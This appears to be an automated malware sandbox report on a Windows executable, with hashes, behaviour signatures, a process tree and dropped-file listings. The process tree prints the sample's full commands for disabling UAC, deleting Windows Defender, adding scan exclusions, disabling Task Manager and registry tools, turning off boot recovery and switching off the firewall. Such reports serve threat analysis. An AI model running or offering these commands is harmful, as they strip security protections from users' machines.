Resubmissions

  • 13-07-2024 09:54  240713-lxcvgawdmn  (score 10)
  • 13-07-2024 09:52  240713-lv46yawdkj  (score 10)
  • 13-07-2024 09:46  240713-lrz3tayajc  (score 10)

Analysis

  • max time kernel: 1794s
  • max time network: 1156s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240709-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13-07-2024 09:54

General

  • Target: f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
  • Size: 3.8MB
  • MD5: 15995b0b1fc5dd82f1c3ba1b7b40c5d4
  • SHA1: 3b6a4a5b8b1107854e35b01cd28b4cce7a003413
  • SHA256: f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35
  • SHA512: 4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781
  • SSDEEP: 49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4908
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:3560
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2176
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4148
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4688
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4000
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2564
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4040
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1112
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4004
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:3604

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: d85ba6ff808d9e5444a4b369f5bc2730
    SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: e5bfec1063a497048fffb231a0621403
    SHA1: 97cf6a89f237f43b9c22e3e081f7d45924d435ba
    SHA256: 325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f
    SHA512: e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: e89c193840c8fb53fc3de104b1c4b092
    SHA1: 8b41b6a392780e48cc33e673cf4412080c42981e
    SHA256: 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
    SHA512: 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 03353f9d8fe5db8d1c03fa41447cab10
    SHA1: f1a6693a0c85bda6192c29ae35315072618dedef
    SHA256: c42a38f755a9222b9937ca4f0a97711a4f2cbb4d52103e9a70522ff0454535b3
    SHA512: d4e1d14a95cc5c58ef57cff55f922cee893e6c3658b60f7ac86689477792148696a2faf97d22bf053dc84174ed73adfeb5e97cb5db560a6361724a509026d9a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: df4d87b6845d3fddf6e659396aea0757
    SHA1: a636715074a17bb786eca83543fb685219f23f57
    SHA256: 0ea4203b826c4795e76f169fb364d512d3b03426c1e82719c6ec3b3446187f70
    SHA512: df4d70ef157b2dafce200cea052f0509d821d14f5cbcf7704149275a3e863ed7bfcda8d7f91b5539aa899c902a5743d13bc01f07797f4b0b564cefff5c36b7c4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 64B
    MD5: 235a8eb126d835efb2e253459ab8b089
    SHA1: 293fbf68e6726a5a230c3a42624c01899e35a89f
    SHA256: 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
    SHA512: a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 38f0f14cc7ca72ad51216866e66efb4e
    SHA1: 34ed0f47a4aaa95e786ca9f125b0341b38bfb9be
    SHA256: 668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501
    SHA512: 4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: ef5ef35c3059825861b16409862d0e3d
    SHA1: cde5311765478b1bcf309219c1a86a0238612099
    SHA256: 53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b
    SHA512: 3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 90a46602aee7837d9bde97b5842a5844
    SHA1: 0aa5875544d05d14cc2f06f9715ebcf5c3656993
    SHA256: 6a6a5f36d7547aa35c2e8f8c4ad359aa15e6a4d3fe5a4c5feca5d9edbd5864d2
    SHA512: 4f74f446047e2cbe9c29c33db3cf3453b91eaa2e086f88ee908e6238544325d96fb5170e991f8a09d3d48a961f8672fd123be5b5b982832f64382af926ffc11a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 214049bdc8d473528180bb22e9fa3ce8
    SHA1: 243a406d6918c60e2763c2205592ff01ea2f6419
    SHA256: 0d5507fa72fa731e53374f15752bcd6204889a80174b7d61bbd2256e7caad424
    SHA512: dceeb8a4a1ac2b9d195c5b6480d9de0543823ac20c8e1b0c7b3851a625ed0d321e41cfd106198701f9bfce08e75bcc249a226171af3b9bafa9983e168d14c332

  • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
    Filesize: 247KB
    MD5: 5cae01aea8ed390ce9bec17b6c1237e4
    SHA1: 3a80a49efaac5d839400e4fb8f803243fb39a513
    SHA256: 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
    SHA512: c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xe4qhm2n.dju.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\prorun.bat
    Filesize: 2KB
    MD5: 0f887625226181fb0136e6145919e56a
    SHA1: 1477b214aafcf9a518f7a13832da00d639f22943
    SHA256: 8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8
    SHA512: 81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

  • memory/4520-28-0x0000021B8EDB0000-0x0000021B8EDD2000-memory.dmp
    Filesize: 136KB

  • memory/4908-0-0x00007FF9E3D13000-0x00007FF9E3D15000-memory.dmp
    Filesize: 8KB

  • memory/4908-1-0x0000028E69BA0000-0x0000028E69F76000-memory.dmp
    Filesize: 3.8MB

  • memory/4908-140-0x0000028E6BDA0000-0x0000028E6BDC0000-memory.dmp
    Filesize: 128KB

  • memory/4908-141-0x0000028E6C640000-0x0000028E6C64A000-memory.dmp
    Filesize: 40KB